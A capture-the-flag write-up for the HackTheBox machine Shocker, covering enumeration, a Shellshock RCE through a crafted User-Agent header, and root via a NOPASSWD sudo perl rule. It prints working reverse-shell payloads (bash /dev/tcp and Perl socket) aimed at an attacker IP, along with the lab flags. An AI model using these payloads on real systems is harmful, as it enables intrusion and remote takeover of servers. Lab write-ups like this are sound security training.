HackTheBox Shocker
Writeup for HackTheBox Shocker
Machine Synopsis
Shocker, while fairly simple overall, demonstrates the severity of the renowned Shellshock exploit, which affected millions of public-facing servers. (Source)
Key exploitation techniques:
- Shellshock vulnerability (CVE-2014-6271) in CGI script
- Remote Code Execution (RCE) via HTTP header injection
sudo
misconfiguration (NOPASSWD
forperl
)- Perl reverse shell for root access
Enumeration
1
2
3
4
5
6
7
8
9
10
11
$ nmap -sC -sV -A 10.10.10.56
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
The scan identified Apache HTTPD on port 80 and SSH on port 2222.
dirsearch
was used to find hidden directories on the web server.
1
2
3
4
$ dirsearch -u 10.10.10.56 -w /usr/share/dirb/wordlists/common.txt
...
[20:21:30] 403 - 294B - /cgi-bin/
...
The /cgi-bin/
directory returned a 403 Forbidden
status, indicating its existence but lack of directory listing. dirsearch
was then run specifically against /cgi-bin/
with common script extensions.
1
2
3
4
$ dirsearch -u http://10.10.10.56/cgi-bin -w /usr/share/dirb/wordlists/common.txt -f -e sh,cgi,bash
...
[20:29:19] 200 - 119B - /cgi-bin/user.sh
...
The user.sh
script was found. Retrieving its content confirmed it was a CGI script.
1
2
3
4
5
6
$ curl 10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
07:31:03 up 30 min, 0 users, load average: 0.00, 0.02, 0.00
Exploitation
Shellshock RCE (shelly)
Research into “cgi bin exploits” and the machine name “Shocker” pointed to the Shellshock vulnerability (CVE-2014-6271). This vulnerability allows command injection through crafted HTTP headers when a CGI script is executed by a vulnerable version of Bash.
A malicious User-Agent
header was crafted to execute a reverse shell payload.
1
2
# Malicious User-Agent header
User-Agent: () { :; }; echo; /bin/bash -c "exec bash -i &>/dev/tcp/<ATTACKER_IP>/<PORT> <&1"
A netcat
listener was set up on the attacking machine. The HTTP request to http://10.10.10.56/cgi-bin/user.sh
was sent with the crafted User-Agent
header (e.g., via curl
or Burp Repeater).
1
2
3
4
5
6
7
8
9
10
# On attacker, set up Netcat listener
$ nc -nlvp 1337
listening on [any] 1337 ...
# Reverse shell received
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.56] 44040
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
shelly
This granted a reverse shell as shelly
. The user.txt
flag was retrieved.
1
2
3
shelly@Shocker:/usr/lib/cgi-bin$ cd /home/shelly
shelly@Shocker:/home/shelly$ cat user.txt
2ec24e11320026d1e70ff3e16695b233
Privilege Escalation
Sudo perl
Abuse (root)
sudo -l
was executed to check shelly
’s privileges.
1
2
3
4
5
6
7
8
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
The output indicated that shelly
could run /usr/bin/perl
as root
without a password. This is a common sudo
misconfiguration that can be abused for root access.
A Perl reverse shell payload was crafted to be executed directly via sudo /usr/bin/perl
.
1
2
# Perl reverse shell payload
sudo /usr/bin/perl -e 'use Socket;$i="<ATTACKER_IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
A netcat
listener was set up on the attacking machine.
1
2
3
# On attacker, set up Netcat listener
$ nc -nlvp 6969
listening on [any] 6969 ...
The Perl payload was executed from the shelly
shell.
1
2
3
4
5
6
7
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.25";$p=6969;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Reverse shell received
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.56] 41834
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
This successfully granted a root shell. The root.txt
flag was retrieved.
1
2
3
# cd /root
# cat root.txt
52c2715605d70c7619030560dc1ca467